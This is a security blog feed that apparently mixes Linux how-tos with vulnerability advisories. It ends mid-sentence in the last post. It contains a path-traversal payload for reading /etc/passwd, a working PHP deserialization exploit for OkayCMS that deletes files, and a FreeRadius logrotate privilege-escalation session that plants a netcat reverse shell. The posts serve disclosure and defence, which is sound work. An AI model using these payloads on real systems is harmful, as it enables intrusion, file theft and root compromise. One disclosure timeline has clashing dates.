FyhTech - Fun with Linux https://tech.feedyourhead.at/ en Creative Contact Form: Directory Traversal (CVE-2020-9364) https://tech.feedyourhead.at/content/creative-contact-form-directory-traversal-cve-2020-9364 <span class="field field--name-title field--type-string field--label-hidden">Creative Contact Form: Directory Traversal (CVE-2020-9364)</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Identifier: AIT-SA-20200301-01<br /> Target: Creative Contact Form (for Joomla)<br /> Vendor: Creative Solutions<br /> Version: 4.6.2 (before Dec 03 2019)<br /> CVE: CVE-2020-9364<br /> Accessibility: Remote<br /> Severity: High<br /> Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</p> <h3>Summary</h3> <p>Creative Contact Form is a responsive jQuery contact form for the Joomla content-management-system.</p> <h3>Vulnerability Description</h3> <p>A directory traversal vulnerability resides inside the mailer component of the Creative Contact Form for Joomla. 
An attacker could exploit this vulnerability to receive any file from the server via e-mail.</p> <p><em>The vulnerable code is located in "helpers/mailer.php" at line 290:</em></p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;">if(isset($_POST['creativecontactform_upload'])) {
    if(is_array($_POST['creativecontactform_upload'])) {
        foreach($_POST['creativecontactform_upload'] as $file) {
            // echo $file.'--';
            $file_path = JPATH_BASE . '/components/com_creativecontactform/views/creativeupload/files/'.$file;
            $attach_files[] = $file_path;
        }
    }
}</pre></div> <p>If an attacker puts "../../../../../../../../etc/passwd" into $_POST['creativecontactform_upload'] and enables "Send me a copy", the contact form sends the attacker the contents of /etc/passwd by e-mail, because $file is appended to the upload directory path unchecked.</p> <p><em>Note: this vulnerability might not be exploitable in the free version of Creative Contact Form, since it does not offer "Send copy to sender".</em></p> <h3>Vulnerable Versions</h3> <p>Creative Contact Form Personal/Professional/Business 4.6.2 (before Dec 3 2019)</p> <h3>Impact</h3> <p>An unauthenticated attacker could receive any file from the server.</p> <h3>Solution</h3> <p>Update to the current version.</p> <h3>References</h3> <ul> <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-9364" target="_blank">https://nvd.nist.gov/vuln/detail/CVE-2020-9364</a></li> <li><a href="https://www.ait.ac.at/ait-sa-20200301-01-directory-traversal-in-creative-contact-form">https://www.ait.ac.at/ait-sa-20200301-01-directory-traversal-in-creative-contact-form</a></li> </ul> <h3>Vendor Contact Timeline</h3> <table class="ce-table" height="89" width="320"> <tbody> <tr> <td>2019-12-02</td> <td>Contacting the vendor</td> </tr> <tr> <td>2019-12-02</td> <td>Vendor published a fixed version</td> </tr> <tr> <td>2019-03-01</td> <td>Public disclosure</td> </tr> </tbody> </table> </div> <span class="field field--name-uid 
field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Mar 09 2020</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> </div> </div> Mon, 09 Mar 2020 20:59:44 +0000 Hoti 288 at https://tech.feedyourhead.at https://tech.feedyourhead.at/content/creative-contact-form-directory-traversal-cve-2020-9364#comments OpenVPN: updating /etc/resolv.conf https://tech.feedyourhead.at/content/openvpn-updating-resolv.conf <span class="field field--name-title field--type-string field--label-hidden">OpenVPN: updating /etc/resolv.conf</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>OpenVPN ships with example scripts that update <em>/etc/resolv.conf</em> through "resolvconf" or systemd-resolvconf. I use neither, so I <a href="https://github.com/whotwagner/update-resolv.conf.git">modified the script</a> so that it simply rewrites <em>/etc/resolv.conf</em> directly. I added a variable "IMMUTEABLE" to this script. If IMMUTEABLE is set to 1, the script sets the immutable file attribute on /etc/resolv.conf. That prevents other programs such as DHCP clients from changing /etc/resolv.conf while OpenVPN is running. I know it's a little bit hacky, but it works for me. <a href="https://github.com/whotwagner/update-resolv.conf.git">The full source can be downloaded from github.com.</a></p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 26 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/tricks" hreflang="en">Tricks</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/bash" hreflang="en">Bash</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/openssl" hreflang="en">openssl</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/downloads" hreflang="en">Downloads</a></div> </div> 
</div> Thu, 26 Dec 2019 16:45:26 +0000 Hoti 287 at https://tech.feedyourhead.at https://tech.feedyourhead.at/content/openvpn-updating-resolv.conf#comments HackADay: A Christmas-Machine(Merry Christmas) https://tech.feedyourhead.at/content/hackaday-a-christmas-machine <span class="field field--name-title field--type-string field--label-hidden">HackADay: A Christmas-Machine(Merry Christmas)</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>This year I want to wish you a merry Christmas with a blog entry about a Raspberry Pi Christmas project. The "christmas-machine" shows Merry Christmas greetings and wishes for the "Christkind" on a TFT display attached to the Raspberry Pi. Christmas wishes can be submitted through a web application that is reachable over Wi-Fi. I placed this installation in the coffee kitchen at the office, and it was very nice to see that my colleagues had a lot of fun with it.</p> <p>Blessings to "Brother Patrick", who gave me that wonderful Joy-IT TFT display.</p> <p> <video controls="" height="360" width="480"><source src="/sites/default/files/DateiUploads/xmasdev.mp4" type="video/mp4" /></video> </p> <h2>Install Joy-IT TFT3.2</h2> This is a very short installation guide for this display. 
Please visit the documentation for this display to see the <a href="http://anleitung.joy-it.net/wp-content/uploads/2017/04/RB-TFT3.2_RB-TFT3.5_Manual.pdf">full installation guide</a>. Edit /boot/config.txt: <pre><code>dtparam=spi=on
dtoverlay=joy-IT-Display-Driver-32b-overlay:rotate=270,swapxy=1
</code></pre> Edit /boot/cmdline.txt and add "fbcon=map:10": <pre><code>console=serial0,115200 console=tty1 root=PARTUUID=6c586e13-02 rootfstype=ext4 elevator=deadline fsck.repair=yes rootwait fbcon=map:10
</code></pre> Install the xorg modules: <pre><code>apt-get install xorg xorg-docs-core xserver-xorg xserver-xorg-core xserver-xorg-input-all xserver-xorg-input-libinput xserver-xorg-input-wacom xserver-xorg-legacy xserver-xorg-video-all xserver-xorg-video-amdgpu xserver-xorg-video-ati xserver-xorg-video-fbdev xserver-xorg-video-fbturbo xserver-xorg-video-nouveau xserver-xorg-video-radeon xserver-xorg-video-vesa
</code></pre> Edit /usr/share/X11/xorg.conf.d/99-calibration.conf: <pre><code>Section "InputClass"
    Identifier "calibration"
    MatchProduct "ADS7846 Touchscreen"
    Option "Calibration" "160 3723 3896 181"
    Option "SwapAxes" "1"
    Option "TransformationMatrix" "1 0 0 0 -1 1 0 0 1"
EndSection
</code></pre> Edit /usr/share/X11/xorg.conf.d/99-fbturbo.conf and set fbdev to "/dev/fb1": <pre><code>Section "Device"
    Identifier "Allwinner A10/A13 FBDEV"
    Driver "fbturbo"
    Option "fbdev" "/dev/fb1"
    Option "SwapbuffersWait" "true"
EndSection
</code></pre> Install the driver: <pre><code>cd /tmp
wget anleitung.joy-it.net/upload/joy-IT-Display-Driver-32b-overlay.dtb
sudo cp joy-IT-Display-Driver-32b-overlay.dtb /boot/overlays/joy-IT-Display-Driver-32b-overlay.dtbo
</code></pre> <h2>Prepare the desktop environment</h2> Install the LXDE desktop: <pre><code>apt-get install lxde-common lxde-core lxde-icon-theme lxde-settings-daemon openbox-lxde-session lightdm lightdm-gtk-greeter chromium-browser unclutter
</code></pre> Set autologin for user pi in lightdm: <pre><code>autologin-guest=false
autologin-user=pi
autologin-user-timeout=0
</code></pre> Edit /etc/xdg/lxsession/LXDE/autostart and remove xscreensaver: <pre><code>@lxpanel --profile LXDE
@pcmanfm --desktop --profile LXDE
@xset s off
@xset -dpms
@xset s noblank
</code></pre> <b>Reboot</b> Edit /home/pi/.config/lxsession/LXDE/autostart: <pre><code>@lxpanel --profile LXDE
@pcmanfm --desktop --profile LXDE
@/home/pi/startxmas.sh
@xset s off
@xset -dpms
@xset s noblank
</code></pre> Remove software: <pre><code>apt-get remove light-locker wpasupplicant
</code></pre> Edit /home/pi/startxmas.sh: <pre><code>#!/bin/bash
DISPLAY=:0.0 unclutter &amp;
DISPLAY=:0.0 chromium-browser --kiosk --disable-restore-session-state --disable-features=TranslateUI --disable-session-crashed-bubble http://localhost/tree.html
</code></pre> <h2>Install the Access-Point</h2> <pre><code>apt-get install hostapd dnsmasq
</code></pre> Edit /etc/hostapd/hostapd.conf: <pre><code>interface=wlan0
driver=nl80211
ssid=xmas
hw_mode=g
channel=11
macaddr_acl=0
</code></pre> Edit /etc/dhcpcd.conf and add the following lines at the end of the file: <pre><code>interface wlan0
static ip_address=10.0.0.1/24
</code></pre> Edit /etc/dnsmasq.d/dhcp: <pre><code>dhcp-authoritative
dhcp-range=10.0.0.50,10.0.0.150,12h
address=/\#/10.0.0.1
interface=wlan0
</code></pre> Edit /etc/default/hostapd and modify DAEMON_CONF: <pre><code>DAEMON_CONF="/etc/hostapd/hostapd.conf"
</code></pre> Configure autostart for hostapd: <pre><code>systemctl daemon-reload
systemctl unmask hostapd
systemctl enable hostapd
</code></pre> <h2>Configure the webservice</h2> <pre><code>apt-get install apache2 php7.3 php7.3-cli php7.3-json git
</code></pre> Download the web files: <pre><code>git clone https://github.com/whotwagner/xmas2019.git /tmp/xmas2019
cp -r /tmp/xmas2019/* /var/www/html/
chown www-data /var/www/html/wishes
</code></pre> <b>Reboot</b> <h2>MERRY CHRISTMAS AND A HAPPY NEW YEAR 2020</h2> </div> <span class="field field--name-uid field--type-entity-reference 
field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 21 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/xmas" hreflang="en">xmas</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/hackaday" hreflang="en">HackADay</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/raspberry" hreflang="en">Raspberry</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Fun" hreflang="en">Fun</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/debian" hreflang="en">Debian</a></div> </div> </div> Sat, 21 Dec 2019 20:28:14 +0000 Hoti 286 at https://tech.feedyourhead.at https://tech.feedyourhead.at/content/hackaday-a-christmas-machine#comments 
BSides 2019: Code diving for pop chains https://tech.feedyourhead.at/content/bsides2019-code-diving-for-pop-chains <span class="field field--name-title field--type-string field--label-hidden">BSides 2019: Code diving for pop chains</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p><img alt="bsides vienna 2019 talk" data-entity-type="file" data-entity-uuid="f551b7b1-0611-4457-9ed1-c6af5193e0d8" height="691" src="/sites/default/files/inline-images/php_object_injection.jpg" width="1460" /></p> <p>I gave a talk at the <a href="https://bsidesvienna.at/">BSides 2019 Vienna</a> about PHP Object Injection. Here is the abstract of the talk:</p> <blockquote> <p>PHP Object Injection is a well-known web vulnerability that could allow an attacker to perform different kinds of attacks by reusing and chaining existing code of the application (gadgets). Sometimes it is easier to find the vulnerability than to discover a proper chain for a remote code execution. This talk illustrates the long road of searching for various "POP chains" by disclosing details of a vulnerability for Okay-CMS. The code of the application will be analyzed and possible payloads will be discussed. A working unauthenticated remote code execution exploit will finally prove the concept.</p> </blockquote> <p>The slides can be downloaded here: <a href="/sites/default/files/DateiUploads/Code_Diving_for_Pop_Chains.pdf">Slides</a></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 11 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/news" hreflang="en">News</a></div> </div> </div> Wed, 11 Dec 2019 12:41:54 +0000 Hoti 285 at https://tech.feedyourhead.at https://tech.feedyourhead.at/content/bsides2019-code-diving-for-pop-chains#comments OkayCMS: Unauthenticated remote code execution https://tech.feedyourhead.at/content/unauthenticated-remote-code-execution-okaycms <span class="field field--name-title field--type-string 
field--label-hidden">OkayCMS: Unauthenticated remote code execution</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Identifier: AIT-SA-20191129-01<br /> Target: OkayCMS<br /> Vendor: OkayCMS<br /> Version: all versions including 2.3.4<br /> CVE: <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-16885">CVE-2019-16885</a><br /> Accessibility: Local<br /> Severity: Critical<br /> Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</p> <h4>Summary</h4> <p><a href="https://okay-cms.com/">OkayCMS is a simple and functional content management system for an online store.</a></p> <h4>Vulnerability Description</h4> <p>An unauthenticated attacker can upload a webshell by injecting a malicious PHP object via a crafted cookie. This can happen in two places: in “<em>view/ProductsView.php</em>” via the cookie "price_filter", or in “<em>api/Comparison.php</em>” via the cookie "comparison". Both cookies pass untrusted values straight to unserialize(). The following code shows the vulnerability in “<em>api/Comparison.php</em>”:</p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;">$items = !empty($_COOKIE['comparison']) ? unserialize($_COOKIE['comparison']) : array();</pre></div> <p>The unsafe deserialization also occurs in “<em>view/ProductsView.php</em>”:</p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;">$price_filter = unserialize($_COOKIE['price_filter']);</pre></div> <h4>Proof of Concept</h4> <p>The following code uses an object of the Smarty component to delete arbitrary files from the web host:</p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;">&lt;?php

if($argc != 3) {
    print "usage: $argv[0] &lt;url&gt; &lt;file&gt;\n";
    exit(1);
}

$url = $argv[1];
$file = $argv[2];

class Smarty_Internal_CacheResource_File {

    public function releaseLock(Smarty $smarty, Smarty_Template_Cached $cached) {
        $cached-&gt;is_locked = false;
        @unlink($cached-&gt;lock_id);
    }
}

class Smarty_Template_Cached {
    public $handler = null;
    public $is_locked = true;
    public $lock_id = "";

    public function __construct() {
        $this-&gt;lock_id = $GLOBALS['file'];
        $this-&gt;handler = new Smarty_Internal_CacheResource_File;
    }
}


class Smarty {
    public $cache_locking = true;
}

class Smarty_Internal_Template {
    public $smarty = null;
    public $cached = null;

    public function __construct() {
        $this-&gt;smarty = new Smarty;
        $this-&gt;cached = new Smarty_Template_Cached;
    }

    public function __destruct(){
        if ($this-&gt;smarty-&gt;cache_locking &amp;&amp; isset($this-&gt;cached) &amp;&amp; $this-&gt;cached-&gt;is_locked) {
            $this-&gt;cached-&gt;handler-&gt;releaseLock($this-&gt;smarty, $this-&gt;cached);
        }
    }
}

$obj = new Smarty_Internal_Template();

$serialized = serialize($obj);

$un = unserialize($serialized);

$headers = [
    'Accept-Language: en-US,en;q=0.5',
    "Referer: $url/en/catalog/myagkie-igrushki",
    'Cookie: ' . 'price_filter=' . urlencode($serialized) . ';'
];

$curl = curl_init();
curl_setopt_array($curl, [
    CURLOPT_HTTPHEADER =&gt; $headers,
    CURLOPT_RETURNTRANSFER =&gt; true,
    CURLOPT_URL =&gt; "$url/en/catalog/myagkie-igrushki/sort-price",
    CURLOPT_USERAGENT =&gt; 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'
]);
$resp = curl_exec($curl);
if(curl_error($curl)) {
    print curl_error($curl);
}
curl_close($curl);


print $resp;

?&gt;</pre></div> <h4>Notes</h4> <p>Because of the high severity of this vulnerability we will not release a full exploit for the remote code execution.</p> <h4>Vulnerable Versions</h4> <p>All versions of the “Lite”-branch including 2.3.4. 
Pro versions prior to 3.0.2 might have been affected too.</p> <h4>Tested Versions</h4> <p>OkayCMS-Lite 2.3.4</p> <h4>Impact</h4> <p>An unauthenticated attacker could upload a webshell to the server and execute commands remotely.</p> <h4>Mitigation</h4> <p>At the time of this publication the vendor has only patched the paid version of the CMS, so switching to other free software or upgrading to the Pro version of OkayCMS is recommended.</p> <h4>Vendor Contact Timeline</h4> <p>2019-08-29: Contacting the vendor</p> <p>2019-09-04: Vendor replied</p> <p>2019-09-17: Vendor released commercial version 3.0.2 including a bugfix</p> <p>2019-09-29: Public disclosure</p> <h4>Advisory URL</h4> <p><a href="https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms">https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms</a></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 02 2019</span>
FreeRadius: Privilege Escalation via Logrotate https://tech.feedyourhead.at/content/privilege-escalation-via-logrotate-freeradius <span class="field field--name-title field--type-string field--label-hidden">FreeRadius: Privilege Escalation via Logrotate</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h2>Identifier: AIT-SA-20191112-01</h2> <p>Target: FreeRadius<br /> Vendor: FreeRadius<br /> Version: all versions including 3.0.19<br /> Fixed in Version: 12.2.3, 12.1.8 and 12.0.8<br /> CVE: <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-10143">CVE-2019-10143</a><br /> Accessibility: Local<br /> Severity: Low<br /> Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</p> <h4>Summary</h4> <p><a href="https://freeradius.org/">FreeRadius</a> is a modular open-source RADIUS suite.</p> <h4>Vulnerability Description</h4> <p>The log directory “radacct” is owned by user "radiusd". User “radiusd” can elevate privileges to “root” because of an unsafe interaction with logrotate.<br /> User “radiusd” owns the log directory /var/log/radius/radacct:</p> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">&nbsp; drwx------. <span style="color: #000000;">3</span> radiusd radiusd <span style="color: #000000;">4096</span> <span style="color: #000000;">26</span>. 
Apr <span style="color: #000000;">16</span>:01 <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span> </pre></div> <p>Log files are rotated once a day (or at any other configured frequency) by logrotate running as user root. The configuration does not use the “su” directive:</p> <p><div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">&nbsp; <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/*/</span>detail <span style="color: #7a0874; font-weight: bold;">&#123;</span>
    monthly
    rotate <span style="color: #000000;">4</span>
    nocreate
    missingok
    compress
<span style="color: #7a0874; font-weight: bold;">&#125;</span></pre></div></p> <p>Since logrotate is prone to a race condition (see <a href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition</a>), user "radiusd" can replace the directory /var/log/radius/radacct/logdir with a symbolic link to any directory (for example /etc/bash_completion.d). logrotate will then place the compressed files AS ROOT into /etc/bash_completion.d and set the owner and group to "radiusd.radiusd". An attacker could simply place a reverse shell into this file.
As soon as root logs in, the reverse shell will be executed.</p> <p>Details of the race condition in logrotate can be found at:</p> <ul> <li><a href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition</a></li> <li><a href="https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges">https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges</a></li> <li><a href="https://github.com/whotwagner/logrotten">https://github.com/whotwagner/logrotten</a></li> </ul> <h4>Proof of Concept</h4> <p>The following example illustrates how an attacker who has already gained a shell as user “radiusd” can elevate privileges to “root”. After downloading and compiling, the exploit is executed and waits until the next daily run of logrotate. If the rotation of the log file succeeds, a new file containing the reverse shell payload is written into /etc/bash_completion.d/ with owner “radiusd”. As soon as root logs in, the reverse shell is executed and opens a shell on the attacker's netcat listener:</p> <p><div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">&nbsp; <span style="color: #666666;">radiusd@redhat7:~$ </span><span style="color: #c20cb9; font-weight: bold;">git clone</span> https:<span style="color: #000000; font-weight: bold;">//</span>github.com<span style="color: #000000; font-weight: bold;">/</span>whotwagner<span style="color: #000000; font-weight: bold;">/</span>logrotten.git <span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten Cloning into <span style="color: #ff0000;">'/tmp/logrotten'</span>... remote: Enumerating objects: <span style="color: #000000;">84</span>, done. 
remote: Counting objects: <span style="color: #000000;">100</span><span style="color: #000000; font-weight: bold;">%</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000;">84</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">84</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, done. remote: Compressing objects: <span style="color: #000000;">100</span><span style="color: #000000; font-weight: bold;">%</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000;">58</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">58</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, done. remote: Total <span style="color: #000000;">84</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span>delta <span style="color: #000000;">35</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, reused <span style="color: #000000;">64</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span>delta <span style="color: #000000;">24</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, pack-reused <span style="color: #000000;">0</span> Unpacking objects: <span style="color: #000000;">100</span><span style="color: #000000; font-weight: bold;">%</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000;">84</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">84</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, done. 
<span style="color: #666666;">radiusd@redhat7:~$ </span><span style="color: #c20cb9; font-weight: bold;">mkdir</span> <span style="color: #660033;">-p</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir <span style="color: #666666;">radiusd@redhat7:~$ </span><span style="color: #c20cb9; font-weight: bold;">touch</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail <span style="color: #666666;">radiusd@redhat7:~$ </span><span style="color: #7a0874; font-weight: bold;">cd</span> <span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten <span style="color: #000000; font-weight: bold;">&amp;&amp;</span> <span style="color: #c20cb9; font-weight: bold;">gcc</span> <span style="color: #660033;">-o</span> logrotten logrotten.c radiusd<span style="color: #000000; font-weight: bold;">@</span>redhat7:<span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten$ .<span style="color: #000000; font-weight: bold;">/</span>logrotten <span style="color: #660033;">-c</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: 
bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail Waiting <span style="color: #000000; font-weight: bold;">for</span> rotating <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail... Renamed <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail with <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail2 and created symlink to <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d Done<span style="color: #000000; font-weight: bold;">!</span> radiusd<span style="color: #000000; font-weight: bold;">@</span>redhat7:<span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten$ <span style="color: #c20cb9; font-weight: bold;">ls</span> <span style="color: #660033;">-l</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d<span style="color: #000000; font-weight: 
bold;">/</span> total <span style="color: #000000;">20</span> <span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> root root <span style="color: #000000;">11144</span> Oct <span style="color: #000000;">28</span> <span style="color: #000000;">2018</span> grub <span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> radiusd radiusd <span style="color: #000000;">33</span> May <span style="color: #000000;">12</span> <span style="color: #000000;">18</span>:<span style="color: #000000;">44</span> detail.1.gz radiusd<span style="color: #000000; font-weight: bold;">@</span>redhat7:<span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten$ <span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #ff0000;">&quot;if [ \<span style="color: #780078;">`id -u\`</span> -eq 0 ]; then (/bin/nc -e /bin/bash localhost 3333 &amp;); fi&quot;</span> <span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d<span style="color: #000000; font-weight: bold;">/</span>detail.1.gz radiusd<span style="color: #000000; font-weight: bold;">@</span>redhat7:<span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten$ nc <span style="color: #660033;">-nvlp</span> <span style="color: #000000;">3333</span> listening on <span style="color: #7a0874; font-weight: bold;">&#91;</span>any<span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #000000;">3333</span> ... 
connect to <span style="color: #7a0874; font-weight: bold;">&#91;</span>127.0.0.1<span style="color: #7a0874; font-weight: bold;">&#93;</span> from <span style="color: #7a0874; font-weight: bold;">&#40;</span>UNKNOWN<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span>127.0.0.1<span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #000000;">55526</span> <span style="color: #c20cb9; font-weight: bold;">id</span> <span style="color: #007800;">uid</span>=<span style="color: #000000;">0</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>root<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #007800;">gid</span>=<span style="color: #000000;">0</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>root<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #007800;">groups</span>=<span style="color: #000000;">0</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>root<span style="color: #7a0874; font-weight: bold;">&#41;</span></pre></div></p> <h4>Vulnerable Versions</h4> <p>All versions including 3.0.19</p> <h4>Tested Versions</h4> <p>Name : freeradius<br /> Architecture: x86_64<br /> Version: 3.0.13<br /> Release: 9.el7_5</p> <h4>Impact</h4> <p>An attacker who 